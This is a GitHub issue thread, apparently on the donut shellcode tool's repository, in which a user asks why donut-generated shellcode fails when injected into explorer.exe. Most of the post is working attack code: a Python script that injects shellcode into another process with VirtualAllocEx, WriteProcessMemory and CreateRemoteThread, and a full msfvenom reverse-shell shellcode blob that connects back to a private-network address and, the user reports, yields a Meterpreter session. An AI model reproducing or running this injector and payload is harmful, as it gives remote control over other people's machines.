Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

shellcode gen with error? #134

Closed
SirKnightV opened this issue Aug 31, 2023 · 0 comments
Closed

shellcode gen with error? #134

SirKnightV opened this issue Aug 31, 2023 · 0 comments

Comments

@SirKnightV
Copy link

Hi, This is the Code i'm testing,

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode = open('loader.bin', 'rb').read()
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

The Shellcode in loader.bin i have generated it downloading in Releases the last version of donut, later i have executed the next command

donut.exe -i msfvenompayload.exe -f bin -o loader.bin

later i have try to execute this code, but i dont get any error, just restart explorer.exe process , i have checked the api parameters at https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights and https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc for make sure all seems correctly, but when i try execute just dont show any error just restart explorer.exe process, but, if i gen shellcode directly from msfvenom and load it like this

shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
shellcode += b"\x41\x50\x52\x51\x48\x31\xd2\x56\x65\x48\x8b\x52"
shellcode += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7"
shellcode += b"\x4a\x4a\x4d\x31\xc9\x48\x8b\x72\x50\x48\x31\xc0"
shellcode += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b"
shellcode += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
shellcode += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
shellcode += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b"
shellcode += b"\x48\x18\x49\x01\xd0\x50\xe3\x56\x48\xff\xc9\x4d"
shellcode += b"\x31\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
shellcode += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
shellcode += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
shellcode += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
shellcode += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
shellcode += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
shellcode += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
shellcode += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x03\x7d\x41\x54"
shellcode += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
shellcode += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
shellcode += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
shellcode += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
shellcode += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
shellcode += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
shellcode += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
shellcode += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
shellcode += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
shellcode += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
shellcode += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
shellcode += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
shellcode += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
shellcode += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
shellcode += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
shellcode += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
shellcode += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
shellcode += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
shellcode += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
shellcode += b"\xf0\xb5\xa2\x56\xff\xd5"

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

when i execute this code it give me meterpreter session , but with the donut shellcode gen no, what is wrong? is me or is donut tool who are bad?, i hope someone can help me to fix this, thanks :)
Note: When i try to generate donut shellcode with -f 5 for python file output and try load i get same issue restarting explorer.exe process but no handler receiving.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@TheWover @SirKnightV